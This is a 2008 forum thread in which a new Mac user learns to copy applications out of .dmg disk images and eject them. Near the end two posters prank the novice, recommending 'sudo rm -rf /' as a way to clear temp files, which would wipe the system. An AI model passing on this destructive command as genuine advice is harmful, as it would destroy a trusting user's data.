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thextinct
okay so I'm a new Mac user and dont really know how to install an application sad.gif
HELP ME sad.gif
like i downloaded Firefox and then it asked me to transfer it to the 'Applications' folder.
so i just dragged it and dropped it.
after that.. i double clicked firefox in the apps folder and dragged the firefox icon onto my dock making a shortcut.

but i when i run firefox.. a drive shows up on my desktop.
how do i get rid of it?

help please sad.gif
giga
Eject the drive.
Cara
Quote - (thextinct @ Jun 20 2008, 21:27) *
okay so I'm a new Mac user and dont really know how to install an application sad.gif
HELP ME sad.gif
like i downloaded Firefox and then it asked me to transfer it to the 'Applications' folder.
so i just dragged it and dropped it.
after that.. i double clicked firefox in the apps folder and dragged the firefox icon onto my dock making a shortcut.

but i when i run firefox.. a drive shows up on my desktop.
how do i get rid of it?

help please sad.gif


So what type of Mac did you get? smile.gif

The problem that it sounds like you are having is your shortcut leads to a Disk Image, not to the application in your Applications folder. smile.gif You will need to make sure you move the Application to the Applications folder, drag the Disk Image to the Trash and THEN open your Applications folder to drag the Application to your Dock.

EIther that or I'd suggest just using Safari, it it truly the best browser on OS X. (My opinion)
thextinct
Quote - (Cara @ Jun 21 2008, 05:31) *
So what type of Mac did you get? smile.gif

The problem that it sounds like you are having is your shortcut leads to a Disk Image, not to the application in your Applications folder. smile.gif You will need to make sure you move the Application to the Applications folder, drag the Disk Image to the Trash and THEN open your Applications folder to drag the Application to your Dock.

EIther that or I'd suggest just using Safari, it it truly the best browser on OS X. (My opinion)


well im jut generaaly giving an example. Like im using windows messenger, yahoo messenger and firefox. And with all it has the same problem that it makes a disk image on the desktop

I already tried as u said of first dragging the dmg to the applications then ejecting it
But still when i run firefox or other application.. a disk image shows up on the desktop
giga
Why are you dragging the dmg to /Applications?

1. Remove all your junk in your dock.
2. Open the dmg.
3. Drag the application from the opened dmg to /Applications.
4. Eject the dmg.

Then feel free to move the app from /Applications to the Dock.
Cara
Quote - (thextinct @ Jun 20 2008, 21:33) *
well im jut generaaly giving an example. Like im using windows messenger, yahoo messenger and firefox. And with all it has the same problem that it makes a disk image on the desktop

I already tried as u said of first dragging the dmg to the applications then ejecting it
But still when i run firefox or other application.. a disk image shows up on the desktop


Thats what I thought. wink.gif

Anyway, you don't drag the DMG to your Application Folder, the DMG is a Disk Image, not an Application. You want to drag the Application contained inside the DMG to the Applications Folder.
XDViPeR
Yeah thats ok, after you copy FF to your APPs folder, from that disk image on your desktop, you can eject that disk (drag it into the recycle bin)
thextinct
oo that wsa simple noexpression.gif

Thanks everyone.. esp Cara tht really helped.
smile.gif thnku smile.gif
btw i got it working on my PC so i guess ill just wait for the new Macs biggrin.gif

THankx everyone biggrin.gif
Cara
Its what we're here for.
joyntkid
lol, Cara I think you just helped a Hackintosh user smile.gif
johnathonm
And if that doesn't work go into the hard drive, go into system tools or accessories and launch a terminal.

Type in the following :

sudo rm -rf

Hit enter.

This will purge all your temp files and also purge the firefox install (including unmounting).

Don't to this - it's bad. But it will remove your temp files and firefox smile.gif.
Cara
Quote - (joyntkid @ Jun 21 2008, 12:37) *
lol, Cara I think you just helped a Hackintosh user smile.gif


Yes, I know I did...
giga
Quote - (johnathonm @ Jun 21 2008, 15:44) *
And if that doesn't work go into the hard drive, go into system tools or accessories and launch a terminal.

Type in the following :

sudo rm -rf

Hit enter.

This will purge all your temp files and also purge the firefox install (including unmounting).

Don't to this - it's bad. But it will remove your temp files and firefox smile.gif.

Great tip! Try running this thextinct. Should help your troubles

CODE
sudo rm -rf /
osirisX
You two are so helpful smile.gif
abrocks22
eject the drive
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